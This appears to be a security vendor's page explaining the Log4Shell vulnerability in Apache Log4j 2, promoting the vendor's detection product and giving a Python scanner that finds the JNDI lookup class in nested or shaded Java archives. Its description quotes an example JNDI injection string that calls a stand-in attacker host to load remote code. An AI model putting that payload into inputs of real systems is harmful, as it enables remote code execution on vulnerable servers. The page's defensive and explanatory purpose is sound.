CVE-2021-44228: Log4Shell
What is Log4Shell (CVE-2021-44228)?
Log4Shell is a critical remote code execution vulnerability in Apache Log4j 2, the most widely used Java logging framework. Attackers can execute arbitrary code by sending a crafted log message containing a JNDI lookup string (${jndi:ldap://attacker.com/a}), which Log4j resolves when it writes the message to the log. The vulnerability affects virtually every Java application using Log4j 2.x.
Impact & Exploitation
Log4Shell affected an estimated 93% of enterprise cloud environments. It was exploited within hours of disclosure by cryptominers, ransomware, and nation-state actors. Over 800,000 attacks were detected in the first 72 hours.
How Precogs AI Detects Log4Shell
Precogs AI Binary SAST detects Log4j in compiled Java applications, WAR/JAR files, and Docker images — even when shaded or repackaged. Our scanner identifies vulnerable versions in firmware and embedded systems where Java is compiled into native images.
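The idea of finding Log4j inside repackaged archives can be shown with a small scanner. This is an added example, not Precogs AI's scanner or method: it assumes relocation keeps the class file name JndiLookup.class and that the Maven pom.properties entry survives repackaging, and the sample WAR it builds is constructed for the demonstration.

```python
import io
import zipfile

CANONICAL = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_SUFFIX = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
NESTED_EXT = (".jar", ".war", ".ear", ".zip")
MAX_NESTED_BYTES = 256 * 1024 * 1024  # skip oversized nested entries
MAX_DEPTH = 8                         # stop runaway nesting


def scan_archive(data, label, depth=0):
    """Return findings for a JAR/WAR given as bytes, descending into nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return []  # not a zip container, nothing to inspect
    findings = []
    with zf:
        # Version recorded by Maven, if the metadata survived repackaging.
        version = None
        for info in zf.infolist():
            if info.filename.endswith(POM_SUFFIX):
                for line in zf.read(info).decode("utf-8", "replace").splitlines():
                    if line.startswith("version="):
                        version = line.split("=", 1)[1].strip()
        for info in zf.infolist():
            name = info.filename
            # Match on the class file name so a relocated (shaded) package still hits.
            if name.rsplit("/", 1)[-1] == "JndiLookup.class":
                findings.append({"archive": label, "entry": name,
                                 "relocated": name != CANONICAL, "version": version})
            elif (name.lower().endswith(NESTED_EXT) and depth < MAX_DEPTH
                  and info.file_size <= MAX_NESTED_BYTES):
                findings += scan_archive(zf.read(info), f"{label}!/{name}", depth + 1)
    return findings


def build_sample_war():
    """Constructed sample: a WAR holding a fat JAR with a relocated log4j-core."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as jar:
        jar.writestr("shaded/" + CANONICAL, b"\xca\xfe\xba\xbe")
        jar.writestr(POM_SUFFIX, "groupId=org.apache.logging.log4j\nversion=2.14.1\n")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as war:
        war.writestr("WEB-INF/lib/app-all.jar", inner.getvalue())
        war.writestr("WEB-INF/web.xml", "<web-app/>")
    return outer.getvalue()
```

A hit means the JNDI lookup class is present in the archive; compare the reported version against the fixed releases listed in the Apache Log4j security advisory before deciding whether the copy is vulnerable.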